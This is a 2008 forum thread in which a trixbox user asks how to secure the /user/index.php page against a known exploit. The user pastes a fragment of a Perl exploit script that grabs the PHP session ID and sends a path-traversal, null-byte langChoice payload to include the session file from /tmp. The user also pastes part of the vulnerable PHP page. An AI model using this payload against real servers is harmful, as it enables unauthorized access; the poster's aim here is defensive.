adv Posted August 7, 2008 Share Posted August 7, 2008 hello i have tribox installed and recently i found out that there is an exploit with connect-back that u can get access to the server the problem is in the /user/index.php i found out the exploit and its made in perl usage() unless @ARGV; my $url = "http://$ARGV[0]/user/index.php"; my $ua = LWP::UserAgent->new; my $cookie_jar = HTTP::Cookies->new; $ua->cookie_jar($cookie_jar); menu(); sub execScript{ my $scriptCode = shift; post($scriptCode); my $phpsessionid = extractPHPSID($cookie_jar->as_string); post("langChoice=../../../../../../../../../../tmp/sess_$phpsessionid%00"); } its getting access to /tmp .. ive tried to chmod 755 /tmp but the index doesnt work it gives an error <?php apache_setenv('QUERY_STRING',$_SERVER["QUERY_STRING"] = addslashes(strip_tags(urldecode($_SERVER["QUERY_STRING"])))); apache_setenv('REQUEST_URI',$_SERVER["REQUEST_URI"] = addslashes(strip_tags(urldecode($_SERVER["REQUEST_URI"])))); ini_set("error_reporting","E_ALL & ~E_NOTICE"); //session_start(); require 'includes/smartysetup.php'; require_once("includes/xajax.inc.php"); include "includes/tbversion.php"; // Grabs version of TrixBox from file /etc/trixbox/trixbox-version $smarty->assign("tbversion",tbversion()); $smarty->assign("title","trixbox - User Mode"); ... ?> ive tried to to comment sesion_start(); it works but does it gives any problems? how to i secure it to keep hackers out? Quote Link to comment Share on other sites More sharing options...
adv Posted August 8, 2008 Author Share Posted August 8, 2008 hello .. plz anybody?? :| Quote Link to comment Share on other sites More sharing options...
adv Posted August 16, 2008 Author Share Posted August 16, 2008 sorry about the topic : i ment to be " trixbox problem " and doesnt anybody know what to do ? how do i secure ittt Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.